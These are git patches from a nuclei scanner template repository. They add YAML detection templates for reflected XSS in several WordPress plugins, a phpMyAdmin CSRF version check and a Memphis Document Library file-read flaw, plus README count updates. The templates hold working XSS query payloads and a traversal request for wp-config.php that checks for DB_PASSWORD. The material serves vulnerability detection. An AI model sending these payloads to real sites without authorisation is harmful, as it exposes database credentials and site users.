63d2932eac116aab9f2909949c91c3c4576d3682 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:52:56 +0700 Subject: [PATCH 0745/4083] Create CVE-2016-1000130.yaml --- cves/2016/CVE-2016-1000130.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000130.yaml diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml new file mode 100644 index 0000000000..f3fcc33305 --- /dev/null +++ b/cves/2016/CVE-2016-1000130.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000130 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4886bc48fd0258cecb34eef62a68c06ba1297a34 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:55:47 +0700 Subject: [PATCH 0746/4083] Create CVE-2016-1000131.yaml --- cves/2016/CVE-2016-1000131.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000131.yaml diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml new file mode 100644 index 0000000000..1e540169b2 --- /dev/null +++ b/cves/2016/CVE-2016-1000131.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000131 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e848640e9d213064ae2cec01e38434edac4ee144 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 16 Jul 2021 23:27:01 +0530 Subject: [PATCH 0747/4083] Added CVE-2019-12616 --- cves/2019/CVE-2019-12616.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-12616.yaml diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml new file mode 100644 index 0000000000..093014e337 --- /dev/null +++ b/cves/2019/CVE-2019-12616.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-12616 + +info: + name: phpMyAdmin CSRF + author: Mohammedsaneem + description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. + severity: medium + tags: cve,cve2019,phpmyadmin,csrf + reference: | + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/" + + matchers-condition: and + matchers: + - type: word + words: + - "4.6.6deb4+deb9u2" + - "phpMyAdmin" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 0eb5990c06ef5e6f6aa7a0c5fcb85d3902fc7ac3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 17:59:09 +0000 Subject: [PATCH 0748/4083] Auto Update README [Fri Jul 16 17:59:09 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 09ff3b9208..7ee95f4c1c 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 449 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 450 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1575 files**. +**128 directories, 1576 files**. From e6cdaee59fdedfbb041e11a62edd81b8596c4ff8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:01:11 +0700 Subject: [PATCH 0749/4083] Create CVE-2016-1000132.yaml --- cves/2016/CVE-2016-1000132.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000132.yaml diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml new file mode 100644 index 0000000000..af30f2ca54 --- /dev/null +++ b/cves/2016/CVE-2016-1000132.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000132 + +info: + name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 977b588c3c95dd882a96a61432980e5a55921240 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:06:22 +0700 Subject: [PATCH 0750/4083] Create CVE-2016-1000133.yaml --- cves/2016/CVE-2016-1000133.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000133.yaml diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml new file mode 100644 index 0000000000..9a682352a7 --- /dev/null +++ b/cves/2016/CVE-2016-1000133.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000133 + +info: + name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 89cd375576fd0057d20a76b140911860acc73d31 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:07:53 +0700 Subject: [PATCH 0751/4083] Create CVE-2016-1000134.yaml --- cves/2016/CVE-2016-1000134.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000134.yaml diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml new file mode 100644 index 0000000000..0a7af624f3 --- /dev/null +++ b/cves/2016/CVE-2016-1000134.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000134 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 3fee8f6145b45ca01f52f9dcd0408f259e6a5898 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:09:08 +0700 Subject: [PATCH 0752/4083] Create CVE-2016-1000135.yaml --- cves/2016/CVE-2016-1000135.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000135.yaml diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml new file mode 100644 index 0000000000..f7703f0121 --- /dev/null +++ b/cves/2016/CVE-2016-1000135.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000135 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 048cdff2257fb687bc32bb1f950dbe3c9793ba69 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 02:07:26 +0530 Subject: [PATCH 0753/4083] Additional matcher --- cves/2020/CVE-2020-12054.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index e937c8a86e..11b19bcd64 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - "" + - "catch-breadcrumb" part: body + condition: and - type: word part: header From b8e3840ad69730b87f5c13d59b2275db684f67a6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 09:59:54 +0530 Subject: [PATCH 0754/4083] Update CVE-2007-0885.yaml --- cves/2007/CVE-2007-0885.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2007/CVE-2007-0885.yaml b/cves/2007/CVE-2007-0885.yaml index 9554822c3a..252ec393c1 100644 --- a/cves/2007/CVE-2007-0885.yaml +++ b/cves/2007/CVE-2007-0885.yaml @@ -23,4 +23,5 @@ requests: - 200 - type: word part: header + words: - "text/html" From dd16d1349a05e4508c5192d7098b9d4eeedfe778 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:02:09 +0530 Subject: [PATCH 0755/4083] Update CVE-2009-1558.yaml --- cves/2009/CVE-2009-1558.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml index f5f348890c..f56848b401 100644 --- a/cves/2009/CVE-2009-1558.yaml +++ b/cves/2009/CVE-2009-1558.yaml @@ -4,6 +4,7 @@ info: name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal author: daffainfo severity: high + description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. reference: https://www.exploit-db.com/exploits/32954 tags: cve,cve2009,iot,lfi From 468cc383f416f2b2d0bbedd35e036183d48b5f16 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:35:07 +0000 Subject: [PATCH 0756/4083] Auto Update README [Sat Jul 17 04:35:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7ee95f4c1c..4506f054c5 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 450 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 452 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1576 files**. +**128 directories, 1578 files**. From 146085a0b8f1937a7927f91cdab9257e16a36ecc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:05:56 +0530 Subject: [PATCH 0757/4083] Update CVE-2016-1000129.yaml --- cves/2016/CVE-2016-1000129.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index 72991376fc..d76c910dcf 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -4,6 +4,7 @@ info: name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 tags: cve,cve2016,wordpress,xss,wp-plugin From f503adee9754fabc0b256233577b06fd5694961d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:07:03 +0530 Subject: [PATCH 0758/4083] Update CVE-2016-1000130.yaml --- cves/2016/CVE-2016-1000130.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index f3fcc33305..36392e35d4 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml @@ -4,6 +4,7 @@ info: name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 tags: cve,cve2016,wordpress,xss,wp-plugin From 993317658932cde23a71aca4a0a66b151ba81c31 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:37:31 +0000 Subject: [PATCH 0759/4083] Auto Update README [Sat Jul 17 04:37:31 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4506f054c5..8c3a31b76f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 452 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 453 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1578 files**. +**128 directories, 1579 files**. From ccff761a30eacffb38821b0a37a5fdc0bcde0bfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:38:54 +0000 Subject: [PATCH 0760/4083] Auto Update README [Sat Jul 17 04:38:54 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8c3a31b76f..97b2c25465 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 453 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 454 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1579 files**. +**128 directories, 1580 files**. From 9e13ac967e526044e116a57e6c229ff73886f7e8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:40:28 +0000 Subject: [PATCH 0761/4083] Auto Update README [Sat Jul 17 04:40:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 97b2c25465..b74d85e047 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 454 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 455 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1580 files**. +**128 directories, 1581 files**. From 2e1222e8657e7a937ed30a386c2a0da6fe385225 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:10:50 +0530 Subject: [PATCH 0762/4083] Update CVE-2016-1000132.yaml --- cves/2016/CVE-2016-1000132.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index af30f2ca54..e72ea63c7b 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -4,6 +4,7 @@ info: name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 tags: cve,cve2016,wordpress,xss,wp-plugin From 2a272f810c26ca5bc3905aa79eb289de3bed023c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:45:51 +0000 Subject: [PATCH 0763/4083] Auto Update README [Sat Jul 17 04:45:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b74d85e047..bcf6565570 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 455 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 456 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1581 files**. +**128 directories, 1582 files**. From 0996d4cf5f31313b95a1c5bf8f493d28f90c537f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:16:20 +0530 Subject: [PATCH 0764/4083] Update CVE-2016-1000133.yaml --- cves/2016/CVE-2016-1000133.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 9a682352a7..658b8562e7 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -4,6 +4,7 @@ info: name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 tags: cve,cve2016,wordpress,xss,wp-plugin From 6a45c29d460fc52241f766b64835634ce5196206 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:18:09 +0530 Subject: [PATCH 0765/4083] Update CVE-2016-1000134.yaml --- cves/2016/CVE-2016-1000134.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index 0a7af624f3..1f35214f3d 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml @@ -4,6 +4,7 @@ info: name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 tags: cve,cve2016,wordpress,xss,wp-plugin From 72cc2adedc84375de2868c6b0972e8241cef5960 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:48:40 +0000 Subject: [PATCH 0766/4083] Auto Update README [Sat Jul 17 04:48:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bcf6565570..8f529b5222 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 456 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 457 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1582 files**. +**128 directories, 1583 files**. From 7d5e27f3d7d6eec02e0712ebef049e62d12eeab7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:19:09 +0530 Subject: [PATCH 0767/4083] Update CVE-2016-1000135.yaml --- cves/2016/CVE-2016-1000135.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index f7703f0121..ba16e3c957 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -4,6 +4,7 @@ info: name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 tags: cve,cve2016,wordpress,xss,wp-plugin From a8d8444747e8d0a53f7da620dfc621e9f53fa03f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:49:37 +0000 Subject: [PATCH 0768/4083] Auto Update README [Sat Jul 17 04:49:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8f529b5222..b6c6064f64 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 457 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 458 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1583 files**. +**128 directories, 1584 files**. From 64851da36d536f797c196e25edf8d66af53a60f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:51:13 +0000 Subject: [PATCH 0769/4083] Auto Update README [Sat Jul 17 04:51:13 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b6c6064f64..0e1cd9e088 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 458 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 459 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1584 files**. +**128 directories, 1585 files**. From 01adebd94c00e8f2caa5c5a29f25970eb88a4c13 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 17 Jul 2021 19:38:12 +0900 Subject: [PATCH 0770/4083] Create wp-plugin-memphis-documents-library-lfi.yaml --- wp-plugin-memphis-documents-library-lfi.yaml | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 wp-plugin-memphis-documents-library-lfi.yaml diff --git a/wp-plugin-memphis-documents-library-lfi.yaml b/wp-plugin-memphis-documents-library-lfi.yaml new file mode 100644 index 0000000000..a5a571178e --- /dev/null +++ b/wp-plugin-memphis-documents-library-lfi.yaml @@ -0,0 +1,27 @@ +id: wp-plugin-memphis-documents-library-lfi + +info: + name: WordPress Plugin Memphis Document Library 3.1.5 LFI + severity: high + tags: wordpress,wp-plugin,lfi,rfd + description: arbitrary file download in Memphis Document Library 3.1.5 + reference: https://www.exploit-db.com/exploits/39593 + +requests: + - method: GET + path: + - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php' + - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 1da88455ecd042fece7b66f62d2d5eb74ea4c0bf Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 17 Jul 2021 19:47:45 +0900 Subject: [PATCH 0771/4083] Update wp-plugin-memphis-documents-library-lfi.yaml --- wp-plugin-memphis-documents-library-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/wp-plugin-memphis-documents-library-lfi.yaml b/wp-plugin-memphis-documents-library-lfi.yaml index a5a571178e..9529fce228 100644 --- a/wp-plugin-memphis-documents-library-lfi.yaml +++ b/wp-plugin-memphis-documents-library-lfi.yaml @@ -2,6 +2,7 @@ id: wp-plugin-memphis-documents-library-lfi info: name: WordPress Plugin Memphis Document Library 3.1.5 LFI + author: 0x_Akoko severity: high tags: wordpress,wp-plugin,lfi,rfd description: arbitrary file download in Memphis Document Library 3.1.5 From fc38b27176c18869421f8df8099c317b1b68b6ce Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 16:32:15 +0530 Subject: [PATCH 0772/4083] minor update --- .../wordpress/wp-memphis-documents-library-lfi.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename wp-plugin-memphis-documents-library-lfi.yaml => vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml (64%) diff --git a/wp-plugin-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml similarity index 64% rename from wp-plugin-memphis-documents-library-lfi.yaml rename to vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml index 9529fce228..4091668e07 100644 --- a/wp-plugin-memphis-documents-library-lfi.yaml +++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -1,12 +1,14 @@ -id: wp-plugin-memphis-documents-library-lfi +id: wp-memphis-documents-library-lfi info: name: WordPress Plugin Memphis Document Library 3.1.5 LFI author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi,rfd - description: arbitrary file download in Memphis Document Library 3.1.5 - reference: https://www.exploit-db.com/exploits/39593 + tags: wordpress,wp-plugin,lfi + description: Arbitrary file download in Memphis Document Library 3.1.5 + reference: | + - https://www.exploit-db.com/exploits/39593 + - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f requests: - method: GET From a526e5dad96952ad89e9c0c3236ef0b107f9c31e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 11:22:26 +0000 Subject: [PATCH 0773/4083] Auto Update README [Sat Jul 17 11:22:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 0e1cd9e088..6d6ebd7b7f 100644 --- a/README.md +++ 